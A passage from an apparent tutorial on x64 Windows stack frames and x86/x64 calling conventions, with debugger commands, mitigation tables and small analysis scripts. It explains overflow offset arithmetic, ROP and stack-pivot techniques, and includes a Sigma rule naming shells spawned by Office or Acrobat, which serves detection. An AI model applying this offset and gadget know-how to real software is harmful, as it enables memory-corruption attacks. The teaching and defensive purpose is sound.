  Shadow [RCX]      ← [RSP + 0x08]   (relative to callee entry)
  Return Address    ← [RSP + 0x00]   ← ret-overwrite target
  Local variables   ← [RSP - N]
[Low address — grows downward]

Figure: The x64 Windows ABI stack layout: extra arguments, 32-byte shadow space, return address, saved non-volatile registers, and local variables down to RSP. The ABI reserves 32 bytes of shadow space above the return address, and RSP remains constant through the function body for RSP-relative addressing.

5. Volatile vs. Non-Volatile Registers and Leaf Functions

The x64 convention splits the register file into volatile (caller-saved) and non-volatile (callee-saved). A function that clobbers a non-volatile register must save and restore it in its prologue/epilogue.

Class	Registers
Volatile (caller-saved)	`RAX`, `RCX`, `RDX`, `R8`–`R11`, `XMM0`–`XMM5`
Non-volatile (callee-saved)	`RBX`, `RBP`, `RDI`, `RSI`, `R12`–`R15`, `XMM6`–`XMM15`

A leaf function changes no non-volatile register (including not altering RSP by calling out). A non-leaf function calls another function — which adjusts RSP — and therefore must establish a frame and register unwind data. This distinction drives whether the compiler emits a prologue and .pdata entry at all.

6. Prologue and Epilogue Deep Dive

The prologue establishes the frame: save callee-saved registers and reserve local space. The epilogue reverses it and returns.

; x86 epilogue
mov  esp, ebp      ; free locals
pop  ebp           ; restore caller's EBP
ret                ; pop return address → EIP

LEAVE is a single instruction equivalent to mov esp, ebp + pop ebp, available on both x86 and x64.

; x64 MASM (ml64) non-leaf frame
sub  rsp, 28h      ; 20h shadow space + 8 bytes alignment padding
; ... body uses [rsp+..] for locals/spills ...
add  rsp, 28h      ; deallocate
ret                ; pop return address → RIP

Many optimized x64 functions omit push rbp entirely and address everything from RSP. Frame Pointer Omission (FPO) saves two instructions and frees RBP as a general register; GCC/Clang do this by default at -O2, and MSVC does similarly with /O2. For exploitation this matters: without a frame pointer there is no [RBP+8] anchor for the return address (the x64 counterpart of x86’s [EBP+4]), so offsets must be computed from RSP at a known instruction.

__declspec(noinline) int callee(int a, int b, int c, int d) {
    int local = a + b + c + d;   // forces a real frame + homing
    return local;
}
int caller(void) { return callee(1, 2, 3, 4); }

Compile this on Godbolt or step it in WinDbg to watch RCX/RDX/R8/R9 home into shadow space.

7. Unwind Data and Structured Exception Handling

x64 Windows requires every non-leaf function to register unwind data in the PE .pdata and .xdata sections so the OS can walk frames during structured exception handling. Each function publishes a RUNTIME_FUNCTION and an associated UNWIND_INFO that describes the prologue.

typedef struct _RUNTIME_FUNCTION {
    ULONG BeginAddress;
    ULONG EndAddress;
    ULONG UnwindData;   // RVA to UNWIND_INFO
} RUNTIME_FUNCTION, *PRUNTIME_FUNCTION;

RtlVirtualUnwind() consumes this data to reconstruct caller frames without a frame pointer. For defenders, intact, parseable unwind data is what lets EDR and crash tooling produce a reliable call stack; ROP chains and stack pivots frequently produce stacks that fail to unwind cleanly — itself a detectable anomaly.
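To make the table lookup concrete, the sketch below parses raw `.pdata` bytes into entries and finds the one covering a given RVA. It assumes the 12-byte x64 entry layout shown above and synthetic data; reading the section out of a real PE file is left to a PE parser.

```python
import struct
from bisect import bisect_right

ENTRY = struct.Struct("<III")   # BeginAddress, EndAddress, UnwindData (all RVAs)

def parse_pdata(pdata: bytes):
    """Split a raw .pdata section into sorted (begin, end, unwind_rva) tuples."""
    usable = len(pdata) - len(pdata) % ENTRY.size
    # Zeroed entries are section padding, not functions.
    return sorted(e for e in ENTRY.iter_unpack(pdata[:usable]) if e[0] != 0)

def lookup(entries, rva: int):
    """Return the entry whose [begin, end) range contains `rva`, else None."""
    i = bisect_right([e[0] for e in entries], rva) - 1
    if i >= 0 and entries[i][0] <= rva < entries[i][1]:
        return entries[i]
    return None

pdata = b"".join(ENTRY.pack(*e) for e in [(0x1000, 0x1040, 0x5000),
                                           (0x1040, 0x10F0, 0x500C),
                                           (0x1200, 0x1234, 0x5018)])
table = parse_pdata(pdata)
print(lookup(table, 0x1050))   # (4160, 4336, 20492)
print(lookup(table, 0x1100))   # None
```

An instruction pointer inside a module's code that matches no entry is either in a leaf function or somewhere execution should not be, which is one reason a failed unwind is worth a second look.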

8. Reading Stack Frames in a Debugger

In WinDbg or x64dbg you read the live frame directly off RSP.

bp mymodule!vuln        ; break at the function
g                       ; run to it
dps rsp L10             ; dump 16 pointer-sized stack slots
r rsp, rbp, rip         ; show live pointers
k                       ; walk the call stack (uses unwind data)

dps rsp L10 prints the raw stack. At function entry the saved return address is the slot at [RSP]; once the prologue has run sub rsp, N (plus any pushes) it sits that many bytes higher, and k resolves it to module!function+offset. A return address that resolves to no module, or to the stack itself, is the first sign of a hijacked frame.
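That triage rule is easy to automate once the module list and stack bounds are known. In the sketch below, `modules` and `stack_range` are hypothetical inputs you would fill in by hand from `lm` and `!teb` output; the addresses are invented.

```python
def classify_address(addr: int, modules, stack_range) -> str:
    """Label an address by where it points.

    `modules` is a list of (name, base, size); `stack_range` is (low, high).
    """
    for name, base, size in modules:
        if base <= addr < base + size:
            return f"{name}+0x{addr - base:x}"
    low, high = stack_range
    if low <= addr < high:
        return "STACK (suspicious)"
    return "UNBACKED (suspicious)"

modules = [("mymodule", 0x7FF6_1000_0000, 0x20000),
           ("ntdll",    0x7FFB_2000_0000, 0x1F0000)]
stack_range = (0x0000_00D0_1FF0_0000, 0x0000_00D0_2000_0000)

for ret in (0x7FF6_1000_1A2C, 0x0000_00D0_1FFF_F8A0, 0x4141_4141_4141_4141):
    print(hex(ret), "->", classify_address(ret, modules, stack_range))
```

The first address resolves to `mymodule+0x1a2c`; the other two land on the stack and in unbacked memory respectively, which are the two cases the paragraph above flags.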

9. How Stack Overflows Corrupt Frame Integrity

Overflowing a fixed local buffer writes past its bounds toward higher addresses, in the direction of the saved frame pointer and the return address.

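# Conceptual layout arithmetic, NOT a payload.
# 64-byte buffer sitting directly below the saved frame pointer and the
# return address (a frame that keeps RBP and has no /GS cookie).
buf_size      = 64
saved_rbp     = 8          # x86: 4
ret_addr_slot = 8          # x86: 4
offset_to_ret = buf_size + saved_rbp             # bytes before reaching the return slot
offset_past_ret = offset_to_ret + ret_addr_slot  # bytes needed to overwrite it fully

print(f"bytes before saved frame ptr: {buf_size}")
print(f"bytes before return address : {offset_to_ret}")
print(f"bytes to cover return slot  : {offset_past_ret}")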

When execution reaches RET, the CPU pops whatever now sits in the return slot into RIP/EIP and jumps there. A controlled overwrite places a valid, attacker-chosen address (a gadget or function); an uncontrolled overwrite leaves garbage, producing an immediate access violation. The distinction matters operationally: uncontrolled corruption crashes loudly (WER dump), while a precise overwrite can transfer control silently — which is exactly why the compiler inserts a guard between the buffer and the return address.

Figure: How an oversized buffer write corrupts the frame. The overflow progresses deterministically from the buffer edge through the GS cookie and saved frame pointer to the return address, hijacking control at the next RET.

10. Modern Mitigations and What They Change About the Layout

Mitigations alter the frame layout or the trust placed in it; none remove the need to understand the stack.

// /GS inserts a cookie between locals and the saved frame data.
void vuln(char *src) {
    char buf[64];
    // prologue: mov rax, __security_cookie; xor rax, rsp; mov [rsp+0x..], rax
    strcpy(buf, src);
    // epilogue: mov rcx, [rsp+0x..]; xor rcx, rsp; call __security_check_cookie
}

Mitigation	Structural Effect
`/GS` stack cookie	`__security_cookie` placed between locals and saved return address; mismatch → `__report_gsfailure`
DEP / NX	`IMAGE_DLLCHARACTERISTICS_NX_COMPAT`; stack pages non-executable, blocking on-stack shellcode
ASLR	`IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE`; randomizes stack/image base, breaking hardcoded addresses
Control Flow Guard	`IMAGE_GUARD_CF_INSTRUMENTED`; validates indirect call targets
Intel CET Shadow Stack	`CETCOMPAT` mitigation; read-only shadow copy of return addresses defeats classic ret-overwrites
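Two of these flags can be audited from a single 16-bit field in the PE optional header. The sketch below decodes a `DllCharacteristics` value using the documented bit values; extracting the field from a file is left to a PE parser, and the helper names are illustrative. The CFG instrumentation flag named in the table lives in the load configuration directory, so the `GUARD_CF` bit here is only the header-level indicator.

```python
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",   # 64-bit ASLR
    0x0040: "DYNAMIC_BASE",      # ASLR
    0x0100: "NX_COMPAT",         # DEP
    0x0400: "NO_SEH",
    0x4000: "GUARD_CF",          # Control Flow Guard
}

def decode_dll_characteristics(value: int):
    """Names of the mitigation-related bits set in DllCharacteristics."""
    return [name for bit, name in DLL_CHARACTERISTICS.items() if value & bit]

def missing_mitigations(value: int, required=("DYNAMIC_BASE", "NX_COMPAT")):
    """Required flags that the image does not opt in to."""
    present = set(decode_dll_characteristics(value))
    return [name for name in required if name not in present]

print(decode_dll_characteristics(0x8160))  # ['HIGH_ENTROPY_VA', 'DYNAMIC_BASE', 'NX_COMPAT']
print(missing_mitigations(0x8160))         # []
print(missing_mitigations(0x0000))         # ['DYNAMIC_BASE', 'NX_COMPAT']
```

A module that reports both flags missing is the kind of non-ASLR, non-DEP image that trampoline searches look for.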

11. Common Attacker Techniques

Technique	Description
Saved return-address overwrite	Overflow a local buffer to replace the return slot (`[RBP+8]` in an x64 frame that keeps `RBP`, `[EBP+4]` on x86) and redirect `RET`
Saved frame pointer overwrite	Corrupt saved `RBP`/`EBP` to desynchronize the frame chain or pivot
Stack pivot	Use a gadget (`xchg rsp, rax`; `leave; ret`) to point `RSP` at attacker data
ROP chaining	Defeat DEP by chaining `ret`-terminated gadgets via the corrupted stack
SEH overwrite (x86)	Corrupt the exception handler chain on the stack to gain control on fault
Off-by-one / frame-pointer overwrite	Single-byte overflow to truncate or shift `EBP`, shifting subsequent frame math

These primitives all depend on knowing the exact offset from a controllable buffer to the saved control-flow data — which is precisely the layout this tutorial defines.

12. Defensive Strategies & Detection

Detection focuses on the crash artifacts and post-exploitation behavior that stack corruption produces, since the corruption itself is often only visible at the moment of RET.

Signal	Detail
Windows Error Reporting	Access violation at abnormal `RIP`; dumps under `%LOCALAPPDATA%\Microsoft\Windows\WER\ReportQueue`; Application Event `1000`/`1001`
Sysmon Event ID 1	Unusual child process from document/browser renderers (T1203 follow-on)
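Sysmon Event ID 10	Process Access: a handle opened with memory-read rights (`GrantedAccess` including `PROCESS_VM_READ`), the precursor to cross-process reads via `ReadProcessMemory`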
Security Event 4672	Special privileges to an unexpected logon (T1068 follow-on)
ETW `Microsoft-Windows-Kernel-Process`	Anomalous `RIP`/`RSP` deltas via call-stack sampling (stack pivot)
ETW `Microsoft-Windows-Security-Mitigations`	Emits events when CFG, DEP, or Shadow Stack violations are blocked

A practical first-line Sigma sketch catches the most common post-exploitation chain — a renderer spawning a shell:

title: Suspicious Child Process From Document Renderer
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    ParentImage|endswith:
      - '\WINWORD.EXE'
      - '\EXCEL.EXE'
      - '\AcroRd32.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\wscript.exe'
  condition: selection
level: high

Hardening checklist: compile with /GS (verify no /GS-), link /NXCOMPAT and /DYNAMICBASE, enable CFG with /guard:cf, turn on CET via SetProcessMitigationPolicy(ProcessUserShadowStackPolicy, ...), enforce /SAFESEH on x86, and configure Windows Defender Exploit Guard for legacy binaries. MITRE mitigation M1050 (Exploit Protection) bundles these OS controls.

13. MITRE ATT&CK Mapping

Stack layout knowledge is foundational rather than a single technique; the mapping below frames it in the defensive direction — recognizing the artifacts each technique produces.

Technique	MITRE ID	Detection
Exploitation for Client Execution	`T1203`	Sysmon `EventID 1` renderer child chains; WER crash dumps
Exploitation for Privilege Escalation	`T1068`	Security `EventID 4672` unexpected source process
Exploit Public-Facing Application	`T1190`	Service crash loops + WER on network-facing daemons
Reflective Code Loading	`T1620`	ETW call-stack anomalies; non-image-backed `RIP`
Process Injection	`T1055`	Sysmon `EventID 8`/`10`; abnormal cross-process access

14. Tools for Stack Analysis

Tool	Description	Link
WinDbg	Kernel/user debugging, `k`, `dps`, unwind walking	microsoft.com
x64dbg	Live user-mode stack inspection on x64/x86	x64dbg.com
Godbolt Compiler Explorer	View prologue/epilogue and FPO across compilers	godbolt.org
Ghidra	Static reconstruction of frames and calling conventions	ghidra-sre.org
Process Hacker	Live thread stacks and call-stack walking	processhacker.sourceforge.io
NASM	Assemble illustrative prologue/epilogue snippets	nasm.us
GDB + pwndbg	Cross-platform frame and offset analysis	gdb.gnu.org

Summary

The stack is a downward-growing region where buffers sit beside the very return address the CPU trusts at RET — which is why it is the primary target of memory-safety exploits.
x86 frames anchor on EBP with multiple calling conventions; x64 uses one convention, RCX/RDX/R8/R9 parameters, 32-byte shadow space, 16-byte alignment, and RSP-relative addressing.
The prologue saves non-volatile registers and reserves locals; the epilogue (LEAVE/RET) reverses it; frame-pointer omission removes the [EBP+4] anchor and forces RSP-relative offset math.
Overflows corrupt saved RBP/EBP and the return address; /GS, DEP, ASLR, CFG, and CET Shadow Stack change the layout’s trust model but not the need to understand it.
Detect follow-on activity via WER dumps, Sysmon EventID 1/10, Security 4672, and ETW mitigation/call-stack events, mapped to T1203 and T1068.

x86 and x64 Calling Conventions: cdecl, stdcall, fastcall, and System V

Objective: Understand how the five major calling conventions — cdecl, stdcall, fastcall, the Microsoft x64 ABI, and the System V AMD64 ABI — dictate argument passing, register ownership, stack cleanup, and alignment, and exactly why those rules determine where return addresses and arguments sit in memory when a vulnerability is triggered.

1. Why Calling Conventions Matter for Exploit Development

A calling convention is the contract between a caller and a callee. It specifies how arguments are passed (stack or registers), where the return value lands, which registers the callee must preserve, and who cleans up the stack. None of this is arbitrary — it is fixed by the ABI for a given platform and compiler.

For a defender or authorized red-teamer, this matters because stack layout is deterministic. When a local buffer overflows, the bytes that land on the saved return address are determined entirely by the convention in force. Reliable overflow payloads, return-to-libc chains, and ROP gadgets all depend on knowing precisely where the return address, arguments, and saved registers sit. Get the convention wrong and your offset math is wrong.

2. Stack Mechanics Refresher: PUSH, POP, CALL, RET

The stack grows downward (toward lower addresses). PUSH decrements the stack pointer (ESP/RSP) and writes; POP reads and increments it.

CALL target pushes the return address (the next instruction’s EIP/RIP) onto the stack, then jumps.
RET pops that saved address back into the instruction pointer.
RET N pops the address and adds N to ESP — this is how a callee cleans caller-pushed arguments.

push arg1          ; arg on stack
call foo           ; pushes return address, jumps to foo
add  esp, 4        ; caller cleans 1 dword arg (cdecl)

Because CALL writes the return address to a predictable slot, any write primitive that reaches that slot redirects control flow. Every convention below differs only in how the arguments around that slot are arranged.
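The four instructions above can be modelled in a few lines of Python. This is a toy sketch, not an emulator: the class name Stack32, the starting ESP value, and the return address 0x00401005 are all hypothetical values chosen for illustration.

```python
class Stack32:
    """Toy model of a 32-bit downward-growing stack (illustrative only)."""

    def __init__(self, esp=0x0012FF00):
        self.esp = esp          # hypothetical starting stack pointer
        self.mem = {}           # address -> dword

    def push(self, value):
        self.esp -= 4                            # PUSH decrements first...
        self.mem[self.esp] = value & 0xFFFFFFFF  # ...then writes

    def pop(self):
        value = self.mem[self.esp]  # POP reads first...
        self.esp += 4               # ...then increments
        return value

    def call(self, return_address):
        self.push(return_address)   # CALL pushes the next instruction's address

    def ret(self, n=0):
        eip = self.pop()            # RET pops the saved address...
        self.esp += n               # ...and RET N also discards N bytes of args
        return eip


s = Stack32()
start = s.esp
s.push(0x41)              # push arg1
s.call(0x00401005)        # call foo
ret_slot = s.esp          # the slot that now holds the return address
eip = s.ret()             # bare RET, as in cdecl
s.esp += 4                # the caller's "add esp, 4"
print(hex(ret_slot), hex(eip), s.esp == start)
```

The return address always lands one slot below the last pushed argument, which is the predictable slot a write primitive has to reach.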

3. x86 cdecl: The C Standard

__cdecl is the default for C functions on 32-bit x86 (MSVC flag /Gd). Arguments are pushed right to left, and the caller cleans the stack. The return value comes back in EAX. C names are decorated with a single leading underscore (_foo), no case translation.

Because the caller cleans up, cdecl is the only x86 convention that supports variadic functions (printf-style va_list) — the callee never needs to know the argument count.

; foo(1, 2, 3);  -- cdecl
push 3             ; rightmost first
push 2
push 1             ; leftmost last
call _foo
add  esp, 12       ; CALLER cleans 3 dwords

Canonical x86 stack frame at function entry (high → low address):

[arg N]          ← pushed first (rightmost)
[arg 2]
[arg 1]          ← pushed last (leftmost)
[return address] ← pushed by CALL
[saved EBP]      ← pushed by prologue (PUSH EBP)
[local vars]     ← ESP after SUB ESP, N

The saved EBP and return address are the primary targets of a stack-based overflow. Overflow a local buffer and you overwrite them in that exact order.
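The frame above translates directly into EBP-relative offsets. The helper below is a minimal sketch, assuming a classic EBP-based prologue, dword-sized arguments, and no canary or padding; the function name cdecl_frame is made up for this example.

```python
def cdecl_frame(num_args, locals_size):
    """Map each frame slot to its offset from EBP (high address first)."""
    layout = {}
    for i in range(num_args, 0, -1):
        layout[f"arg{i}"] = 8 + 4 * (i - 1)   # arg1 sits just above the return address
    layout["return address"] = 4              # pushed by CALL
    layout["saved EBP"] = 0                   # pushed by the prologue
    layout["locals (lowest byte)"] = -locals_size
    return layout


frame = cdecl_frame(num_args=3, locals_size=64)
for label, off in frame.items():
    print(f"[EBP{off:+#x}] {label}")
```

Under these assumptions, a buffer that starts at the lowest local address reaches the return address after locals_size + 4 bytes.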

Diagram showing x86 cdecl stack frame from high to low address: last argument, first argument, saved return address, saved EBP, then local buffer where overflow begins — In cdecl, overflowing a local buffer overwrites saved EBP and then the return address in exactly this order — making the offset deterministic.

4. x86 stdcall: The Windows API Convention

__stdcall is the convention for the Win32 API. Arguments still push right to left, but the callee cleans the stack using RET N. This is efficient for fixed-argument functions, but it forbids variadics.

Name decoration encodes the byte count of stack arguments: a leading underscore, an @, then the size in bytes (always a multiple of 4). MessageBoxA with four pointer/int args becomes _MessageBoxA@16.

; foo(1, 2);  -- stdcall, two dword args
push 2
push 1
call _foo@8
; NO add esp here — callee handled it
foo:
    ; ... body ...
    ret 8          ; CALLEE pops 8 bytes of args

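For shellcode and custom loaders, note where the @N suffix actually lives: it appears in object files and import libraries, while system DLLs such as user32.dll export undecorated names (MessageBoxA, not _MessageBoxA@16). Resolve Win32 APIs by their undecorated export names, and expect decorated names only when a DLL was built to export them that way.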
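The difference between caller and callee cleanup is easiest to see by tracking ESP through one call. The function below is an illustrative sketch with a hypothetical name (esp_after_call); it assumes a 32-bit near call and ignores everything the callee does between entry and RET.

```python
def esp_after_call(esp_before_pushes, arg_bytes, convention):
    """Return (ESP right after the callee returns, bytes the caller must still add)."""
    esp = esp_before_pushes - arg_bytes   # caller pushes the arguments
    esp -= 4                              # CALL pushes the return address
    if convention == "stdcall":
        esp += 4 + arg_bytes              # RET N pops the return address plus N bytes
        caller_fixup = 0
    elif convention == "cdecl":
        esp += 4                          # bare RET pops only the return address
        caller_fixup = arg_bytes          # caller still owes "add esp, N"
    else:
        raise ValueError("unknown convention")
    return esp, caller_fixup


print(esp_after_call(0x1000, 8, "stdcall"))
print(esp_after_call(0x1000, 8, "cdecl"))
```

With stdcall the stack is already balanced when control returns; with cdecl the arguments are still on the stack until the caller removes them.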

5. x86 fastcall: Register-Based Argument Passing

__fastcall (MSVC flag /Gr) passes the first two integer arguments in ECX and EDX; remaining arguments push right to left, and the callee cleans them. Decoration uses a leading @ (e.g. @foo@8). All __fastcall functions must have prototypes.

; foo(1, 2, 3);  -- MSVC fastcall
mov  ecx, 1        ; arg1 in ECX
mov  edx, 2        ; arg2 in EDX
push 3             ; arg3 on stack
call @foo@12

⚠️ Compiler variance: __fastcall is not standardized across compilers. MSVC uses ECX/EDX. Borland passes the first three arguments in EAX, EDX, ECX. When reversing a non-MSVC binary, verify register usage before trusting any decompiler’s __fastcall label.
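The MSVC name-decoration rules for the three x86 conventions described so far fit in one small function. This is a sketch of the C (not C++) decoration scheme only; the function name decorate is hypothetical, and arg_bytes is the total size of all parameters, including the ones fastcall passes in registers.

```python
def decorate(name, convention, arg_bytes=0):
    """Return the MSVC-style decorated C name for a 32-bit function."""
    if convention == "cdecl":
        return f"_{name}"                  # leading underscore only
    if arg_bytes % 4:
        raise ValueError("argument bytes must be a multiple of 4")
    if convention == "stdcall":
        return f"_{name}@{arg_bytes}"      # underscore, name, @, byte count
    if convention == "fastcall":
        return f"@{name}@{arg_bytes}"      # leading @ instead of underscore
    raise ValueError("unknown convention")


print(decorate("foo", "cdecl"))
print(decorate("MessageBoxA", "stdcall", 16))
print(decorate("foo", "fastcall", 12))
```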

6. Microsoft x64 ABI: The Modern Windows Convention

On Windows x64 there is effectively one ABI; the /Gd, /Gr, /Gz flags only exist for x86 targets. The convention is a four-register fastcall:

Argument slot	Integer register	Float register
1	`RCX`	`XMM0`
2	`RDX`	`XMM1`
3	`R8`	`XMM2`
4	`R9`	`XMM3`

Key rules:

One-to-one correspondence: each argument maps to exactly one register/slot; a single argument is never split across registers.
Any argument larger than 8 bytes, or not sized 1/2/4/8 bytes, is passed by reference.
Arguments beyond the first four go on the stack after the shadow space.
The stack must be 16-byte aligned before CALL.
The x87 register stack is unused by the convention and must be treated as volatile across calls; all floating-point work uses the 16 XMM registers.
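The positional rules above can be sketched as a small placement function. It is a simplification under stated assumptions: arguments are described as hypothetical (kind, size) pairs, vector types and __vectorcall are ignored, and stack offsets are given relative to RSP at the moment of the CALL.

```python
INT_REGS = ["RCX", "RDX", "R8", "R9"]
FP_REGS = ["XMM0", "XMM1", "XMM2", "XMM3"]


def ms_x64_assign(args):
    """args: list of (kind, size); kind is 'int', 'float' or 'struct'.

    Returns a list of (location, passed_by_reference) tuples.
    """
    placement = []
    for slot, (kind, size) in enumerate(args):
        by_ref = size not in (1, 2, 4, 8)     # other sizes travel as a pointer
        if by_ref:
            kind = "int"                      # the pointer is an integer argument
        if slot < 4:
            # The slot number alone picks the register; kind picks the column.
            where = FP_REGS[slot] if kind == "float" else INT_REGS[slot]
        else:
            # Stack arguments start right above the 32-byte shadow space.
            where = f"[RSP+{0x20 + 8 * (slot - 4):#x}]"
        placement.append((where, by_ref))
    return placement


print(ms_x64_assign([("int", 4), ("float", 8), ("struct", 16), ("int", 8), ("int", 8)]))
```

Note how the float in slot 2 takes XMM1 rather than XMM0: on Windows the register is chosen by position, not by counting arguments of each class.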

Shadow space (home space): the caller must allocate 32 bytes on the stack before the CALL, even if the callee takes fewer than four arguments, and reclaim it afterward. The callee may spill RCX/RDX/R8/R9 into this region.

; foo(a, b, c, d) -- Microsoft x64
mov  rcx, a
mov  rdx, b
mov  r8,  c
mov  r9,  d
sub  rsp, 20h      ; 32 bytes shadow space (caller's job)
call foo
add  rsp, 20h      ; reclaim shadow space
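The snippet shows only the shadow-space reservation. In a complete function the same SUB usually also covers locals and keeps RSP 16-byte aligned at every CALL, which is why sub rsp, 28h is so common in real prologues. The calculation below is a sketch of that arithmetic; the function name frame_alloc and its parameters are hypothetical.

```python
def frame_alloc(locals_bytes, max_callee_args=4, pushed_regs=0):
    """Bytes to subtract from RSP in the prologue of a non-leaf function.

    On entry RSP % 16 == 8, because the caller aligned the stack and
    CALL then pushed an 8-byte return address.
    """
    stack_args = max(0, max_callee_args - 4) * 8   # outgoing args 5, 6, ...
    needed = 0x20 + stack_args + locals_bytes      # shadow space is always reserved
    misalign = (8 + 8 * pushed_regs + needed) % 16
    return needed + (16 - misalign) % 16           # pad up to the next 16-byte boundary


print(hex(frame_alloc(0)))                   # no locals, no pushes
print(hex(frame_alloc(0, pushed_regs=1)))    # one "push rbp" already fixes alignment
```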

Volatile (caller-saved): RAX, RCX, RDX, R8, R9, R10, R11, XMM0–XMM5.
Non-volatile (callee-saved): RBX, RBP, RDI, RSI, R12–R15, XMM6–XMM15.

Diagram of Microsoft x64 ABI stack layout showing stack arguments above the mandatory 32-byte shadow space, the saved return address written by CALL, and the callee local frame below, with registers RCX RDX R8 R9 carrying the first four arguments. The shadow space sits between the caller's stack arguments and the saved return address, so it lies above the return address and is the first region an overflow reaches after overwriting RIP; it does not change the distance from a callee's local buffer to the return address.
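The same layout can be written out as RSP-relative offsets at callee entry, before the prologue runs. This is a minimal sketch; the function name ms_x64_entry_layout is hypothetical.

```python
def ms_x64_entry_layout(stack_arg_count=0):
    """List (offset from RSP, description) pairs at the callee's first instruction."""
    layout = [(0x00, "return address")]
    for i, reg in enumerate(["RCX", "RDX", "R8", "R9"]):
        layout.append((0x08 + 8 * i, f"home slot for {reg}"))   # caller-reserved shadow space
    for i in range(stack_arg_count):
        layout.append((0x28 + 8 * i, f"stack argument {5 + i}"))
    return layout


for offset, what in ms_x64_entry_layout(stack_arg_count=2):
    print(f"[RSP+{offset:#04x}] {what}")
```

Everything listed here lies at or above the return address; the callee's own locals are allocated below it.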

7. System V AMD64 ABI: The Linux and macOS Convention

System V AMD64 is followed on Linux, macOS, FreeBSD, Solaris, and other POSIX systems. It uses six integer argument registers:

Argument slot	Integer register	Float register
1	`RDI`	`XMM0`
2	`RSI`	`XMM1`
3	`RDX`	`XMM2`
4	`RCX`	`XMM3`
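5	`R8`	`XMM4`
6	`R9`	`XMM5`
7	(stack)	`XMM6`
8	(stack)	`XMM7`

The two register columns are allocated independently: the third integer argument goes in RDX even if two floating-point arguments precede it. Additional arguments push onto the stack in reverse order. The return value is in RAX; for 128-bit returns the high 64 bits go in RDX. The stack is 16-byte aligned just before CALL.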

Callee-saved: RBX, RBP, R12–R15. All others are caller-saved.
Red zone: the 128 bytes below RSP are reserved and untouched by signal/interrupt handlers. Leaf functions may use this area as their entire frame without adjusting RSP.
Syscall variant: kernel entry uses the same registers except R10 replaces RCX (because the syscall instruction clobbers RCX).
Varargs: for variadic functions, AL must hold an upper bound on the number of vector (XMM) registers used, 0–8.

; write(1, buf, len) via syscall -- System V
mov  rax, 1         ; sys_write
mov  rdi, 1         ; fd (arg1)
mov  rsi, buf       ; buffer (arg2)
mov  rdx, len       ; count (arg3)
; NOTE: a syscall uses R10 in place of RCX for arg4
syscall
; leaf function may freely use [rsp-128 .. rsp] (red zone)

⚠️ Shadow space and the red zone are mutually exclusive and commonly confused. Shadow space (32 bytes directly above the return address) exists only on Windows x64. The red zone (128 bytes below RSP) exists only on System V. Never assume both.

Graph comparing System V AMD64 ABI and Microsoft x64 ABI side by side, highlighting differing argument registers, the System V red zone versus the Microsoft shadow space, and their shared 16-byte alignment requirement — Red zone and shadow space are mutually exclusive per-platform features — conflating them is a classic source of cross-platform shellcode crashes.
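The System V register rules from this section can be sketched with two independent counters, one per register class. This is a simplified illustration: the function name sysv_assign is hypothetical, only scalar 'int' and 'float' arguments are handled, and the ABI's struct classification rules are left out.

```python
SYSV_INT = ["RDI", "RSI", "RDX", "RCX", "R8", "R9"]
SYSV_FP = [f"XMM{i}" for i in range(8)]


def sysv_assign(kinds, syscall=False):
    """kinds: list of 'int' or 'float'. Returns (locations, XMM registers used)."""
    int_regs = list(SYSV_INT)
    if syscall:
        int_regs[3] = "R10"          # the syscall instruction clobbers RCX
    next_int = next_fp = 0
    locations = []
    for kind in kinds:
        if kind == "int" and next_int < len(int_regs):
            locations.append(int_regs[next_int])
            next_int += 1
        elif kind == "float" and next_fp < len(SYSV_FP):
            locations.append(SYSV_FP[next_fp])
            next_fp += 1
        else:
            locations.append("stack")   # registers of that class are exhausted
    return locations, next_fp           # next_fp is what a variadic call puts in AL


print(sysv_assign(["int", "float", "int"]))
print(sysv_assign(["int"] * 4, syscall=True))
```

Unlike the Windows convention, the second integer argument still lands in RSI when a float sits between the two integers.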

8. Side-by-Side Comparison and ABI Detection in Disassembly

Property	Microsoft x64	System V AMD64
Integer arg registers	`RCX, RDX, R8, R9`	`RDI, RSI, RDX, RCX, R8, R9`
FP arg registers	`XMM0`–`XMM3`	`XMM0`–`XMM7`
Shadow space	32 bytes (mandatory)	None
Red zone	None	128 bytes below `RSP`
Callee-saved	`RBX, RBP, RDI, RSI, R12`–`R15`, `XMM6`–`15`	`RBX, RBP, R12`–`R15`

Recognition heuristics in IDA/Ghidra:

A sub rsp, 0x20 immediately before CALL and arguments loaded into RCX/RDX/R8/R9 ⇒ Microsoft x64.
Arguments loaded into RDI/RSI/RDX and writes into [rsp-8] without a prior sub rsp ⇒ System V (red zone).
A ret N (non-zero immediate) on 32-bit code ⇒ stdcall or fastcall; arguments in ECX/EDX distinguish fastcall.
A bare ret with caller-side add esp, N ⇒ cdecl.

Automated ABI detection can misfire on hand-written assembly, non-MSVC fastcall, or -fomit-frame-pointer builds — always confirm against the actual prologue.
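The four heuristics can be expressed as a toy classifier over disassembly text. This is a rough sketch and inherits every weakness listed above: it works on plain Intel-syntax strings, mixes call-site and callee evidence in one list, and the function names are hypothetical rather than part of any disassembler's API.

```python
MS_ARG_REGS = {"rcx", "rdx", "r8", "r9"}


def _norm(line):
    # Drop comments, lowercase, remove whitespace: "sub rsp, 20h" -> "subrsp,20h"
    return "".join(line.split(";")[0].lower().split())


def guess_convention(instructions):
    lines = [_norm(i) for i in instructions]
    # Destination operands of MOV instructions, e.g. "rcx" or "[rsp-8]"
    dests = {l[3:].split(",")[0] for l in lines if l.startswith("mov")}
    subs_rsp = any(l.startswith("subrsp,") for l in lines)
    if any(l in ("subrsp,0x20", "subrsp,20h") for l in lines) and dests & MS_ARG_REGS:
        return "ms_x64"
    if any("[rsp-" in l for l in lines) and not subs_rsp:
        return "sysv_amd64"                      # red-zone access
    if any(l.startswith("ret") and l[3:] not in ("", "0") for l in lines):
        return "fastcall" if dests & {"ecx", "edx"} else "stdcall"
    if any(l.startswith("addesp,") for l in lines):
        return "cdecl"                           # caller-side cleanup
    return "unknown"


print(guess_convention(["mov rcx, a", "sub rsp, 20h", "call foo"]))
print(guess_convention(["push 2", "push 1", "call _foo@8", "ret 8"]))
```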

9. Calling Conventions as an Attack Surface

Each convention places the return address at a known offset from a local buffer. That offset is the difference between a working and a failing overflow.

In 64-bit binaries, overflowing a buffer controls stack contents, not registers directly — which is exactly why return-oriented programming is needed. To call a libc function on x64 Linux, you must first load the argument register: a pop rdi ; ret gadget sets arg 1 before the call. This is a direct consequence of the System V ABI placing arg 1 in RDI.

